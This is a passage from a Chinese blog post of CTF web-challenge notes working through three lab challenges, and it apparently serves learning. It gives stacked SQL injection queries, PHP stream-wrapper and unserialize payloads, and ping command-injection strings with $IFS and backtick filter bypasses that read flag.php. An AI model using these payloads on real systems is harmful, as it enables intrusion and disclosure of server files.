Nonono.</span><br><span class="line">1&#x27; order by 1 --+                      # Nonono.</span><br><span class="line">admin                                  # 空</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;显然，由于没有给出报错、True、False等信息，且程序似乎将<code>&#39; ~~~ &#39;</code>格式的字串识别为注入字串；在不考虑存在黑名单字符检测的情况下，剩下堆叠注入和二次注入；根据刚学的堆叠注入，尝试<code>query=1; select 1,2,3</code>，得到反馈</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/19_%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%B0%9D%E8%AF%95.png" class title="19_堆叠注入尝试">

<p>&emsp;&emsp;也即该题为堆叠注入类型，可执行多条MySQL查询语句，反复尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">query=1; select 1,2,group_concat(schema_name) from information_schema.schemata --+     # Nonono.</span><br><span class="line">query=1; select 1,2,3,4,5           # 1,2,3,4,1</span><br><span class="line">query=1; show databases             # ctf, ctftraining information_schema mysql performance_schema test</span><br><span class="line">query=1; select schema_name from from information_schema.schemata          # Nonono.</span><br><span class="line">query=1; select 1,2,3 from from information_schema.schemata                # Nonono.</span><br><span class="line"># 还是要从1,2,3,4,1的回复来突破</span><br><span class="line">query=1; select 2,3,4,5,6           # 2,3,4,5,1</span><br><span class="line">query=1; select 2,3,4,5,6543        # 2,3,4,5,1</span><br><span class="line">query=1; select 2,3,4,5,0           # 2,3,4,5,0</span><br><span class="line">query=1; select 2,3,4,5,*           # 空</span><br><span class="line"># 也就是说，程序中必定存在一个判断机制，若最后一个数为false，返回0</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;根据所测试的样例及返回的结果，程序应当是对select的参数进行检测：对k个参数检测，如果非合法输入，则不返回或No；对最后一个参数进行更严格的检测，只要非数字，即不返回或No，对数字进行true和false的判断，故可以尝试将通配符*置于前k-1个参数位</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">query=1; select 2,3,4,5,*           # 空</span><br><span class="line">query=1; select 2,3,4,*,6           # 空</span><br><span class="line">query=1; select 2,3,*,5,6           # 空</span><br><span class="line">query=1; select 2,*,4,5,6           # 空</span><br><span class="line">query=1; select *,3,4,5,6           # 出现flag</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;看来前面的猜测还有点错，不过不影响我们解出答案╮( ˘ ､ ˘ )╭</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/19_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="19_结果展示">

<h2><span id="22_zjctf-2019nizhuansiwei-php伪协议-file_get_contents-反序列化-preg_match-有问题尚未解决">22_[ZJCTF 2019]NiZhuanSiWei –PHP伪协议 –file_get_contents() –反序列化 –preg_match() –有问题尚未解决</span></h2><p>&emsp;&emsp;进入环境得到PHP代码(好久没遇到这么单纯的题了)，审计代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];                <span class="comment"># GET方式传参</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];                <span class="comment"># GET方式传参</span></span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&quot;password&quot;</span>];        <span class="comment"># GET方式传参</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))&#123;</span><br><span class="line"><span class="comment"># 如果text存在，且对file_get_contents进行了绕过(方法见441)</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="comment"># 输出</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">    <span class="comment"># ???这函数啥</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Not now!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//useless.php</span></span><br><span class="line">        <span class="variable">$password</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$password</span>);</span><br><span class="line">        <span class="comment"># password为经过序列化之后的字串</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;来吧，学习一下preg_match()，以下是结合文心一言的信息</p>
<p>&emsp;&emsp;**int preg_match ( string pattern , string subject [, array &amp;matches [, int flags &#x3D; 0 [, int $offset &#x3D; 0 ]]] )**，用于字符串的匹配，匹配成功返回1，失败返回0，错误返回false</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>类型</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>pattern</td>
<td>string</td>
<td>要搜索的模式，即正则表达式。这个字符串必须是一个有效的正则表达式，否则 preg_match() 会返回 FALSE 并可能产生一个警告（取决于错误处理设置）</td>
</tr>
<tr>
<td>subject</td>
<td>string</td>
<td>要进行搜索的字符串</td>
</tr>
<tr>
<td>matches</td>
<td>array</td>
<td>如果提供了这个参数，并且匹配成功，它将被填充为包含结果的数组。第一个元素（matches[0]）将包含整个匹配到的字符串，随后的元素是捕获的子模式匹配结果</td>
</tr>
<tr>
<td>flags</td>
<td>int</td>
<td>这个参数可以设置为 PREG_OFFSET_CAPTURE，这样 matches 数组中返回的每个匹配结果都会附加一个额外的元素，表示该匹配在 subject 字符串中的偏移量</td>
</tr>
<tr>
<td>offset</td>
<td>int</td>
<td>从 subject 字符串的哪个位置开始进行搜索。默认为 0，即从字符串的开头开始。如果 offset 大于字符串的长度，preg_match() 将返回 FALSE</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;这下子明确了，开始对三个参数进行处理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">text=data://tetx/plain,welcome to the zjctf</span><br><span class="line">file=php://filter/read=convert.base64-encode/resource=useless.php</span><br><span class="line">=&gt; 以下为Base64解码后的useless.php代码</span><br><span class="line">class Flag&#123;  //flag.php</span><br><span class="line">    public $file;</span><br><span class="line">    public function __tostring()&#123;</span><br><span class="line">        if(isset($this-&gt;file))&#123;</span><br><span class="line">            echo file_get_contents($this-&gt;file);</span><br><span class="line">            echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">        return (&quot;U R SO CLOSE !///COME ON PLZ&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">=&gt; password=O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span><br><span class="line">整合为：</span><br><span class="line">/?text=data://tetx/plain,welcome to the zjctf&amp;file=php://filter/read=convert.base64-encode/resource=useless.php&amp;password=O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;<strong>枯了，死活出不来，只好去看大佬的WriteUp；诶，也没啥不一样啊，步骤都对啊？哦，file&#x3D;useless.php才行啊？</strong></p>
<p>&emsp;&emsp;这下才出来flag了，不过我还是不理解这是为什么，留待日后解决；不过也要打个醒，<span style="background-color: yellow;">不是啥参数都是PHP伪协议</span></p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/22_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="22_结果展示">

<h2><span id="1096_gxyctf-2019ping-ping-ping-ping命令注入-空格绕过-flag字串绕过">1096_[GXYCTF 2019]Ping Ping Ping –ping命令注入 –空格绕过 –flag字串绕过</span></h2><p>&emsp;进入环境，霍，刚学，见3873，直接<code>127.0.0.1;</code>后跟shell语句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">;pwd                        # /var/www/html</span><br><span class="line">;ls /                       # 1fxck your symbol!</span><br><span class="line">;ls                         # flag.php index.php</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/1096_%E5%88%9D%E6%AD%A5%E5%B0%9D%E8%AF%95.png" class title="1096_初步尝试">

<p>&emsp;&emsp;到这里就很刻意了，代码将空格放入了黑名单，而flag.php也在当前目录中，于是想办法绕过空格符即可，直接<code>cat&lt;flag.php</code></p>
<p>&emsp;&emsp;好吧不止有空格在黑名单中，cat、&lt;、或者flag也在，试试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">;ls&lt;/                       # 空</span><br><span class="line">;flag                       # fxck your flag!</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;根据上述尝试，应该是flag被监测了，查找在shell语句中空格的绕过方法</p>
<table>
<thead>
<tr>
<th align="center"><code>$IFS$</code></th>
<th align="center"><code>$IFS$6</code>(其他数字亦可)</th>
<th align="center"><code>$&#123;IFS&#125; </code></th>
<th align="center"><code>&lt;</code></th>
<th align="center"><code>&lt;&gt;</code></th>
<th align="center"><code>%20(space)</code></th>
<th align="center"><code>%09(Tab)</code></th>
</tr>
</thead>
</table>
<p>&emsp;&emsp;对上述一一尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">;echo&lt;hello</span><br><span class="line">:echo&lt;&gt;hello</span><br><span class="line">;echo$IFS$hello        # OK</span><br><span class="line">;echo$IFS$6hello      # OK</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;行，就用<code>$IFS</code>，接下来是flag，不过注意到除了flag还有一个index.php，<code>cat$IFS$index.php</code>康康它，得到黑名单</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/1096_index%E6%9F%A5%E7%9C%8B.png" class title="1096_index查看">



<p>&emsp;&emsp;问题还是回归到如何绕过flag字串，这里学习到了两种好用的方法</p>
<table>
<thead>
<tr>
<th align="center">代码</th>
<th align="center">原理</th>
</tr>
</thead>
<tbody><tr>
<td align="center">;cat$IFS$1`ls&#96;</td>
<td align="center">Linux会先执行反引号下面的语句，并将执行结果返回原式继续运行</td>
</tr>
<tr>
<td align="center">;a&#x3D;f;cat$IFS$$alag.php</td>
<td align="center">字符拼接，先定义字符变量a，再在命令中使用$a代替f</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;这里取第一种(<strong>注意，这里必须使用带数字的空格替换方式，否则不会出现flag</strong>)作为演示，flag如下</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/1096_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="1096_结果展示">

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF-Web/" rel="tag"># CTF-Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/10/24/Python%E7%AC%AC%E4%B8%89%E6%96%B9%E5%BA%93%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-NumPy/" rel="prev" title="Python第三方库学习笔记-NumPy">
                  <i class="fa fa-angle-left"></i> Python第三方库学习笔记-NumPy
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">作者：陈展</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  





</body>
</html>
